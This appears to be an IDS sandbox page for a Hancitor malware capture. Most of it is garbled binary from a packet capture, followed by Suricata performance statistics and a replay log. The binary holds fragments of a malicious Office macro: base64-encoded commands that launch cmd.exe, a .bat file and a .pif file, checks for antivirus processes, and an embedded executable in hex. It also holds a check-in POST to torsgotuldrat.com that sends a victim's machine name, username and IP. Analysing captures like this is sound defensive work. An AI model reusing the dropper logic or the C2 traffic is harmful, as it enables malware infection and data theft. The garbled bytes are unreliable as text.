Ôë†5å¯Cúk€²´:fU媤Òû’ßØ´—‰Ù­Ï²ª²»¿I.>¸à””– ìŽ“ø¼Ö&]Ä	裫€™
@3ÅfqŠEª±=ç¾ qÊ$šçvâFҘKX²)4—§s:V»	p¢®5º”m%¹;;ç'ÀÞN}QnÉΚø
‘ú\ÀŽf¥k3êã6C#AMuЕÖĜ?€Mb›ÛÁ76±gÓQ¯>Ó&/U{2þÍøMófl/%%å(OÔ¦2!§Ç
6À™Á]€â„ÛKdpTÎlóH¦@b³AìRþ]Ëk^Q°ÕCݬ;ú‹pl°	ڝ¦BÊq´7@_Úµ°»•¿‚n}ÊÝOódIŠ­ó’6@sel°\$A—Taµ«5Ð^–r½Ñ´×–Wâ\WWïW_4+FÕÄ^çpZÆ]àQÔŽ°·Ó¡.°3Ó×õøpØÎ\8‰»ÀE·ìKkb®ìtÇÓðÈmUzõ9²WýâßL€ú¢â(.),
@}Ì6f~¤±'Qñ¨®‘u0µÃ»Q¶Á~u_Ó¶lô ³	™0ëjìÎ}}:«¡±ÏbdC.P­.‡Ì HnA<‡š^övjÏ‚¤¾ª+D.6“«Ì1ƒ &µ|MuЕv¢ªBm@Ճޗiý¦eIªÙ8ú lUʦ_–÷÷'Pÿ—Ì´,ƒ’€ÀÒT“\ÚfjÓái0™šj¢&g ø&“ùTæä~çªg?
f¤Ä8ûikc9/¥Ñc·Sµf*72.‚Ìd‰Ê¢°Ó`
?
¦_$avwªÛ¤Á4˜VÂWˆZLOV‘LƒQmb†ÓRÂô¥ÈY—j‹ª£hŒûƤ¾¾Ñ¿
¢õaIDAT©OYÊZÎ7êNƒ±8“Ó:gö?9LƒÖí·e8YVM„ÎL„§X^eӁÔq'a ‰Ýå3¿ß¬±›S'­›“Ü	À`´XÍQÎf¦½Óê֙(jjæݨAY¢DŽ›$SY„ñ(˜,œÏ¢`w§~'7zš¢[_ÕX}5'B'¥Ù’N@719q¥äòèÕªµøGL„ößØì2@£ú¬åòr©ÎDh߶ËûµõF	@`—BºØBnš*“…wN6¼_À>sà €ƒë¥ïB €¶®Íwã’€°à!È˔ÁsS»&•|lç¤'£ÝÓÆO†€å¾Éï€IÕy»X+x\ªëJß±%Ÿ ºødûŒ–”ðs°ñ9tŸ
è{üSíՃXê©
R=˜¹êU"ë
y€¶€móË­ y€zàQ`i:WW‰ë'yôêû¯{ǎýHu_‹$w/P²Ï-­«L?L4Ó½[ugª¿{ؾÜ'@ýèùÎZõâ $\’°ýœè·ø$ÍÄàL=Š¤°¯ÞñqïØñu[€öixêæµ ¨6î^£ä^îÓiÊG5©‡B駱Œƒ%	@Ûï›ÇÅ™
@Ý
”O Õ¯Þ	ރdß±ã?ê Í)¹l'ÝýË}:Øæõ¸,ý*¢I^û%	@[ÀB?iE´mڗçØG$‡oÛ1Qå?Ú$Ýk”üË}tÚ×nÈ⨠ÓÏF®Çµ_’ð(ß8!_<æ0~óDð²	ûŽð£
ÐM±ñ/÷\³Î\³ÎbFêEÜh½/Zþ”
ePÀP!˜é´å\ùƒ{d©_’ð(_8¦_Q±2Í;v–à’k€.gQ˜…X«§0ûôK€"Ó¼–¡×é»ÌóoÛQä;+‚:ŽwGáË}º8nÔãŒý+à*ÀC hps€æn9¢ß-äÞ¶ãÞ±ã?²è_!<<°32@µ“™iå Ȝð8ϋ‘@5
F½kǼ~ÛÍyqïØéMƒ)ÝÛ#Ü	â¦Á˜×(eöE@aÖêe$rpXNƒQo rK€$unҟ­çHw&BO¢ô2mån©îî`g"´}>‚¿XO»™ig"´\’ز4ŸŒFE|RŽ×^¹ÍóZÿ«ÎóvegùÔþüs@žÝ÷xš•%	MòtÍ%³\ÿo™¤Xo[ë.àA$Ež«Ø[€InÌ·€í,y¸,›z“Å	@àðŒ+0Y15GÈ Ùf³²€C˜þÏ-$çxL‡h¢Óªá·2›mv	@ø·MMﳜ]`Ù؛Ö&“jÒ	«6¯æ¢ß<SaÐäy3W¡–¹lMš”ÛH¢æ£ú)©DÛvÙ œ©F۬Ć
£yRŠ]Èt@—ÉH5D͟"¾Ä_*©óùTôæ'Aƒu,–žå•H7ỶZ{–Ëb&êOóß¡©…T
Ž}á§ú¨«Äl¤
0%“_´ª¬ÓRÅ¿©­B…9y!3û®L6fÁrvk™þσܜÝ#€Qùr8!’6…ÀÌQ€*|×/žÈT2€ã<·¹4
~ÊÌbCh·i—±(?+«4À¨؈„hY¶¼˜É%ë°XÊÎýh.#f&;ïe5•Å™5µ({·EJÕò°G¥ˆÁ‰©Ý0œ‹?'º µÀ´*ÅÕL×b]ÉàšW®¶ä6frIUO[]Õâ_j~¹`k²àu5÷{ð ‚~¢
@Ý–' À‰»äg¯&2ìDb”¢Õ4*d²4âGûY¡p./Š?t¯ÒÿTȕ¦nD‡ªÀ`›¥ŠL×”Ê`ÀLí#•¡¡óÖEº	@µ¶úf&3½T˨Pifqf#ݘËÔ·™‰2Õ&—v|Hüip\ŒL6ÎıÌÙž™ŒKÌ6D¦©žÎlYÔBtk¸	—‹·¦vïöàg`¢Ïü¤Øúb€µŒ“6ÀjÕNUŽeˆ‰dÌLÐüÔªXk‡ÐlÓ-ӆ%œ5Ðôáå_zÉ2ÀñÈvQÕ_úÛR­4ž\;ћLMÔUº*±+Ù4u#þ’í¾ÙLW‘…×öj÷Ÿ¹‹î¬"Y~¿œßZ+«B$¦ß#€Ÿ€¥ýD^|.ãù.°êìɬg*m€ª|¢°qi©z©ö'µÎ’”ß»e¢”a1€MâgaÎs÷‰	@Eãr8ËÜvìmµÌEá&æÓÒ ½Ü'6V‹ÂVóI¥³Ë Êä1ýÿ 'jE°\°5ùK[ô{ð³®8NÃà@šhpà,
ÀÙn`÷9˙jÎݸo?Å*­(uÕ&¶Ž|&ê¿q°UcLÙ¢¿ùÝ<çÿŸÀƒ²£ÀÓY·¬Oƹ›3€êâ^`©ˆ-Ó»{º*¸<Ý2QÊdÑýÉá.ðx.pê»ÀKp÷9³J^µñhÿã¡Æ¦‰\™Mgqº®m€jÀ8@ß–[Kótš„{ð &6&A‘ͪtYŠoÛÆ
bLƒA9¿Úd‘ÿ©’±‚½Ë
‚ÌÌ E­fŠ\³Î\³ÎbFêEÜh½/Zþ”
ePÀP|øT:™Ô~dQªµÍ È`N£ÌªhF`]+¿‘ Ǎ>8™×U“ÉqÂ
éÁ
qPz¶M Þ.lM”Rýåöàa˜;AƝi0uYÔúŒm€öNVµš»"«uýô4˜i4•Åý”DÓ`ÔU®¤€ÉÀ4˜©Ì$9#1mԌ<õ¥þ3˜³0ƒi0C˜ˆc
pTʹwî[ۀÈLšÉÀ4™Úµ˨‚éh"l,ÿÑĘÉ#)‹"\.ÜZR•Ñ<{£‰Ði5^€jBï8í¸6o=×N„ÙXº»æÜOjrᆐøy€n›v²´
Àyi&1Ô橺¤¦úÞîO3za†¡°ßÖAªMNSßJž¸ÉÀDhשõçd*YÅÏä(v0"$‘C+~¹pkµ=²{p`]óµïL{p·«øimґžRýX”\Šð“¤ö¦ºÇÒ|<mQ{€3yÁð±ä_ûˆ¢ì´¤ØÊf&yjþ•æ“Þ·E2¸’\Ô/>´âház÷!‹eƒƒoó¼6ÿlòäÑþ€C­<¯’GuâíAŠˆÓfÛÀd–®ü†Ö3-²Ñ(+ʽ@e<Þhg?€‹þá°Êç+¿ü=È_´ý€”U*kêí´	Àˆ#Çª™ùS¦LÑdQçcÛä¹>UÆö#ÑXlôy&~œˆï¥ú.)íV&¢C=UÉZè-ŒýJI%¾s±`7œÏ§bI¹­ZüC-0ÉçbûemÓɕa&zë™Kž´4…¬Å?š¹îOd³«Ô+úM¹æØgͤšD»pe“Uд#}ˆº
¢r«B&aX©\C¥ÎÄTVq"—J½«Q&«m®¾kU™@¹
_5òªD)ÿNÍå‰$Ÿª#ÍU³²ökLódªöï¾QÈ*ÝøÔ¿™I®Ž+OôŸºêô†ËÌþƀÃc
qꔅ8K™i5•'8AË&a‘
³¹øs.O®™\·€•8ÛJ4Á2yšÉmµj%¹ù¤	Õؾ¶Ûp^ˆm••8sñ‘Z`’«E“NnQ½›Ç©ì·'nÂ^T-@€nÓzÍ ™;‘ù­v¦–te˼”«¤ùXn}>ꔻQûûœËòLÅQÊlí.¢¬dìLu¸
×AÎLfê§Æ¬0S?‰¦y]änMµ¼µ1ç֘êoŠ8sUe³ £`Z‰ßt¦¾/ÄolR%œ	8̜؎`*PµóÄù6V§M҈“D5\ª ×'¿+T/sVôP¥]"ÏÔÙ6§X£Všš–Vš·¦ëm7œM±×*9jq¾NF~TÃ-Z«&“ë­ëBŠ-OLÆöÐm:^Ó,íwá˖¨âUsÑÂR0,·Ìs€ºAZÎd¦Å¬s
p*P¤Í,‡ZÈÿn4¢Tâ[Q´RĖ
Àº_¤EžÙUÅGøh–©Œº¹ŒÎL.‘˜Ž®_cšªõ7‰ºÀ¦Êê8V'ÿSæcÀ¡à؆™NŠ6QièÏ~ÕÉßµúgùW·ìN7w9.it¢˜“Ìt`ý†õi_º~­(ˆ¹(ºç2}Ü¢sݾ±]`]HŒ³f„Y€vÓfÍ2é^f4»ˆË¦Rbbkf¨Ü2«Mø™ºŸu3
à\–ÇÔ¡Hµ©iŠ?S€™LGñÅØüWDÖb;ËĚòJñy¢š‡c·9¿ÆTõt}4¿‡Z&ç`šÿˆ¿º¿1€tŸŠ“ÏöÚlÆÈ,™›óEœŸ0iäzcróÊõÿLÖoØ`:V¹ëæ—[4‹cʎ³ÊFàŠ4köÐì"(Û¬2}SÑø\³Î\³ÎbFÜEÎiË/Zþ”
ePÀP‹Ïëg£^¹Ý&LúìHò`à#¾(ÃHTC=3¡h¾­Ä®eÎÌ.J—úr£ÍD|®pæЯ¡°
@vƒX›ß§ø…€à ½ØÀ&¾8$:z²	´F&*0T‰Eäß³h¦ß°K©Z^Ž
[€&Ü¢Y`í
©‡}—`±<}ÙÔ¬ ““±¼*—{Y£¨ØÀ&ïà<
Àfãl@àD£À.°ëñ9YUWó‘íöɶ]9@½•E"}ªI÷:“ß°K)}á*À2ì«kV]`™÷ï—QXÙÄõUõŒ–;îëƒO]™†pžë처êP”]àpÚJ·<u]àYжk,@Ùn–tºÀ8pá<@€Á HtÛA]UèkýrD‡OÙ@}¶õ¶Ióþ~£T+g*'f=’ÚQ<Ò¸`ŒA¦½Ôk†S÷&*·ì.\Ùô˜u*×ýêYÙ+·©‰A¦jDe¾,ő´À±Ì.?"~lÇnÕDÎìÆÁ H€É(X#
@{|fD]­Ðs{ÜÑ끬ÆÖˆÃÜ	âPMƒÉT(ÊnéØõÇúB½ŸÓªI U/ÇrF£G‹§:²ŠIarÁmØ¥T*75.Tñ4³è¬èLƒ©G©lÕ5Ñ4µ‹8G37Æôþ:»peSSk
5á.1U—[]ÝhÌL ˃Ÿ™´îqX«Ë‹•èѶþºb£ç—‡§Á¸”3ø‚5‚ÔßèF¤ªñM­¨’WªHW†Ó`@4/°ÀÎDèiêN&?ìD葚qÛ﫹ÉÙÌ´4Ì reW
7ìSJnj,\f–rN„Ve¡“2œ­Nµ3׬źu'ݚµ)Ë$Ï¢]زÉ/[ya@~o“;(÷Š‰Ð" ëE¨6>–½×6o³u3ZÖgþJ¦‰Ð.EŽËµkh¾‘‹Oe™Õ¯S
¸¶’Ñú‰Ð °~y§ï²y5/¢k€°¶r¶Ã…Wã½	à~
À]t6ÒWü|_ž°6ÏwõQ"m™‡O p@ÒÆ=§dë?óYÎ\Îòílw\xeSo²8`¬?°«2@ 	@;.ÑO--õÈöàUGêõCúUBzIó²¡àµGޗd_!äÐÞwª5•·
ÛÒù—÷¸—(Ù²Hò>Ö<‰—³[ËôÓVäæT±[~™îÕ,iÁ«ŽäÓ`Æù¬‘/Ij£ {íт÷%ù×™ôO©ôsœDpÍ£§–ÈïÜK”LYTÖÉ ÕoCrË[ÓÏƚ뱩WÀ}Pþ3xՑzºK¥BÅ>2Õ íÑàû’ü+„lúðÌääùZșÉ8ÿòÿ¥Òuw[ý,–&\.ޚÚ}ðœ;Ø<e¶õ^u¤ 7žFèŸ4ü¾$ÿ
!€þ<²Ý7›Éà²O\ö/ïñ»(;ï5— ñËù­É‡’ÊÄ4Åón[4\³Ïó *â3/Zþ”
ePÀ¬\³Ï\³Ïó E‚i/Zþ”
ePÀP?]ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ(S<ÿÿÿÿS<ÿÿÿÿS<ÿÿÿÿS<ÿÿÿÿÿÿš0{6AE74A1C-FDFC-4255-9938-7D4012F4D215}{50C1ACA3-D7AE-4936-81E9-00B75EE37EE3}ÿÿÿÿx€þÿ8 ÿÿÿÿ0ÿÿÿÿÿÿÿÿÿÿ%þÿÿÿÿÿÿÿÿÿÿÿÿÿhÿÿ8ÿÿÿÿÿÿÿÿ%ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ8ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿßþÊÿÿÿÿÿÿÿÿxÿÿÿÿâ°Attribute VB_Name = "UserForm6"
"

€Bas€0{6AE74A1C-FDFC-4255-9938-7D4012F4D215}{50C1ACA3-D7AE-4936-81E9-00€B75EE37}
dGlobal!‹SpacoFalseŠCreatablPre declaIdÔTru
BExpose0TemplateDeriv–Customiz‹DrUÀ@@@~xÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿaSÑSSñ Z"a	Zÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ(¹. tȹ4Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA==$z |$x¹VGVtcA==$¬\³Ï\³Ïó E‚i/Zþ”
ePÀPó£z |$x$D¹XDYuZXhl$z |$x –A@”|ÿÿ˜kÿÿº¹n360 †$œ¹4CB52522 n r¹. tȹVGVtcA==$z |$x$D¹XDYuZXhl$z |$x –A@”|ÿÿðkÿÿ躹PccNT †$œ¹4CB52522 n r¹. tȹVGVtcA==$z |$x$D¹XDYuZXhl$z |$x –A@”|ÿÿHkÿÿ@º¹uiSeAgnt †$œ¹4CB52522 n r¹. tȹVGVtcA==$z |$x$D¹XDYuZXhl$z |$x –A@”|ÿÿ kÿÿ˜º¹mbam †$œ¹T¹e¹m¹p$D¹\1s.bat¬«Ï¬Õ¹cGluZyBsb2NhbGhvc3QgLW4gNjA=$z |$xØ –Ù¬Õ¹c3RhcnQgJXRlbXAlXDYucGlm$z |$xØ –ÙWÿÿà¹4CB52522 l¹6¹.pifȹT¹e¹m¹p$D¹\1s.bat –A@”|ÿÿpkÿÿhº¹mbamtray †$œ¹T¹e¹m¹p$D¹\1s.bat¬«Ï¬Õ¹cGluZyBsb2NhbGhvc3QgLW4gNjA=$z |$xØ –Ù¬Õ¹c3RhcnQgJXRlbXAlXDYucGlm$z |$xØ –ÙWÿÿ€¹4CB52522 l¹6¹.pifȹT¹e¹m¹p$D¹\1s.bat –A@”|ÿÿkÿÿ¹4CB52522 l¹6¹.pifȹ4Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3Q¬\³Ï\³Ïó E‚i/Zþ”
ePÀP¶{gLW4gMTAwICYmIA==$z |$x¹VGVtcA==$z |$x$D¹X¹DYuc¹Glm$z |$x –A@”oÿÿ0–oÿÿ –èoÿÿ–@]õà]õðÉ.žð¹b64 ž%¦.¢¹
bin.base64 ¢(¨ œ ¢(d ¢!ª'zð².¢ð².žiÿÿ€ú¹.– ]õDÀð¹*SELECT * FROM Win32_Process WHERE Name = ' ¬¹'¹w¹in¹mg¹mts¹$:{impersonationLevel=impersonate}!\\ ®¹\root\cimv2$²%´.° °!¶¬›Gº'jiÿÿˆÿÿÿÿ€ÿÿÿÿþÿÿÿ	

 !"#$%&'()*+,-./0123þÿÿÿ56789þÿÿÿ;þÿÿÿþÿÿÿ>þÿÿÿ@ABCþÿÿÿEþÿÿÿþÿÿÿHþÿÿÿJKLMþÿÿÿOþÿÿÿQRSTUVWþÿÿÿYþÿÿÿ[\]^þÿÿÿ`þÿÿÿþÿÿÿcþÿÿÿefghþÿÿÿjþÿÿÿlþÿÿÿnþÿÿÿpqrsþÿÿÿuþÿÿÿþÿÿÿxþÿÿÿz{|}þÿÿÿ€׶Attribute VB_Nam€e = "bc"
Sub closee()

Dim pl, kk, gdfsfsa
kk!d.com^

pl kk ChDir Environ("€T" & "e
’m
p"WllXjgf, tyr8etw>JStrConv(DecodeBase64("ZXhl"), vbUnfiG
E1"6Š®jddsd€fda As HHingX
= UserForm5.TextBox1wyrt fdsad4cx@vxc4\³Ï‚D۟/Zþ”
ePÀ\³Ï\³Ï‚DêEÜh½/Zþ”
ePÀP£–2A69F0-16DC-11CE-9E98-00AA00574A4F} UserForm7 
   Caption         =   "UserForm7"
   ClientHeight    =   3165
   ClientLeft      =   45
   ClientTop       =   390
   ClientWidth     =   4710
   StartUpPosition =   1  'CenterOwner
   TypeInfoVer     =   1
End
	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïþÿÿÿôòóõþÿÿÿþÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ@€H€,€€uã4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000\³Ï\³Ï‚DêEÜh½/Zþ”
ePÀPÏ"ø\³Ï\³Ï‚DÜEÎiË/Zþ”
ePÀPž}000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004\´{ÁÚm!
e6ó{'ÀPö\´{\´{ÁÚEÌé¡
e6ó{'ÀPPɉGET / HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: api.ipify.org
Cache-Control: no-cache

4\´|	#+Š
eÙ‹ËÀPÍ\´|\´|	#±E£6
eÙ‹ËÀPPµÎPOST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: torsgotuldrat.com
Content-Length: 129
Cache-Control: no-cache

GUID=5630222068961844480&BUILD=20wvy12&INFO=PSIMON-SUCKZ-PC @ PSimon-Suckz-PC\art.garfunkle&IP=173.66.146.112&TYPE=1&WIN=6.1(x64)4\´};m+e-(•"
ePÀ¬\´}\´};mE‚Ô»-(•"
ePÀP×jM›¶.Î=òUP‚óÂ=ÍÔÛÕx^è/MopJn9]Á0à™Õ/ÉØNȘàoMÛ¾æƒÜYZö¨ÛŽ›ê¿ø°C‡¨‘T}¬:ÎÒXõøEUÈ­Uτë]µxC*Åã ¼šÁ4•j8AAèYpȺÈXȃÒ˜•«´Á€AÐüÕU@ýUšÅäÅõ=pÅ[Ù¨áÖuÆÛ÷–œØD×LØzB°‚²Ô}Ç+jp!·ßìcç¤ü¨_ÖãDó‰˜ÏXùC“º¸ð¹' كu.TŸ¦KWÊÚñCÍ
ã!ÁfèÝ^õã›ÀüœÚ9ïÊق#WVRmS™RV×ÜÈÎE<_­ÊQq擻C§ÓTêþ”¦ú¹ÿhVRª5´ð±Æ[ô™žt”É#
üèC´éI”ÉɀùB«n‡‹¨Õ!Ô°ÈXÛ÷Ö1ÿ[°ÄŒEò‰AÛ8¨^Ø.‘„¨žœ@Ä ×yìOl„•KøåKœl4UfÏ¿Âì5VSygÛ@¨D좛ÒHh9ì
,WŠŒƒhø•	ÝéDWˆ¨@Ý=l¯™pÈ$ŽºÈވ¨$†×[ɏ–©DQ&‚`ƒ§£TÄîÊUN[ØZ÷­$½Dùí°”{Í%CÙR-(܃›æ+hX٘I€kâU™X…k¨ÙìíÎå+ðeý£è€+±áËCZŠ0Y”Ò`Oˆ€+ìH¥çÉǍ
Ý´Ð}¨“ ©¹uÙ¬c‘œÔÌîÄ­R”ŠrQà‡F׍ü”ø

This file has been truncated.


keyword_perf.log - (13990 bytes) - download
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 3/29/2019 -- 07:44:08
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             6866320         2311            2311            28323           2971.00         2971.00         0.00           
  content          39436530        2436            1187            504532          16189.00        16372.00        16015.00       
  pcre             3977995         1011            80              61491           3934.00         6366.00         3725.00        
  byte_test        767375          224             80              33522           3425.00         3696.00         3275.00        
  isdataat         16874           6               0               2866            2812.00         0.00            2812.00        
  flowbits         1771091         608             35              27031           2912.00         3421.00         2881.00        
  urilen           644388          195             67              39492           3304.00         3746.00         3073.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             6866320         2311            2311            28323           2971.00         2971.00         0.00           
  flowbits         1717472         595             22              27031           2886.00         3005.00         2881.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          4566596         450             209             79586           10147.00        14094.00        6725.00        
  pcre             137504          7               1               45397           19643.00        11698.00        20967.00       
  byte_test        767375          224             80              33522           3425.00         3696.00         3275.00        
  isdataat         14272           5               0               2866            2854.00         0.00            2854.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         53619           13              13              8122            4124.00         4124.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          858930          210             125             54613           4090.00         3960.00         4280.00        
  pcre             797217          106             21              25989           7520.00         7574.00         7507.00        
  isdataat         2602            1               0               2602            2602.00         0.00            2602.00        
  urilen           644388          195             67              39492           3304.00         3746.00         3073.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_client_body
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          94360           24              5               5590            3931.00         3376.00         4077.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          27483           9               0               3343            3053.00         0.00            3053.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          30713863        912             248             504532          33677.00        54976.00        25722.00       
  pcre             2390156         801             0               22806           2983.00         0.00            2983.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          2238063         565             408             41925           3961.00         4063.00         3695.00        
  pcre             525664          73              35              61491           7200.00         6309.00         8021.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          291523          83              60              5028            3512.00         3487.00         3577.00        
  pcre             29630           5               5               11142           5926.00         5926.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_accept
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  pcre             9708            1               0               9708            9708.00         0.00            9708.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_type
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          32318           9               7               3878            3590.00         3541.00         3763.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_protocol
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          15306           4               4               4201            3826.00         3826.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          217926          63              55              4288            3459.00         3450.00         3518.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          337909          94              59              5340            3594.00         3781.00         3279.00        
  pcre             88116           18              18              11388           4895.00         4895.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3608            1               1               3608            3608.00         3608.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          38645           12              6               4009            3220.00         3037.00         3403.00        


IDSDeathBlossom.py.log - (1214 bytes) - download
2019-03-29 07:43:46,367 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-03-29 07:43:47,072 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-03-29 07:43:47,072 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2019-03-29 07:43:47,073 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-03-29 07:43:47,073 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-03-29 07:43:47,073 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/53c8dfa5c61083990e65afc5c20decf456b33745cb75ec8c950e11a498e082d2 -r /var/pcap/03292019.0743-2018-12-20-Hancitor-1st-run-retreives-Pony-EvilPony-Ursnif-and-SmokeLoader.pcap -vvv -k none
2019-03-29 07:44:08,306 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
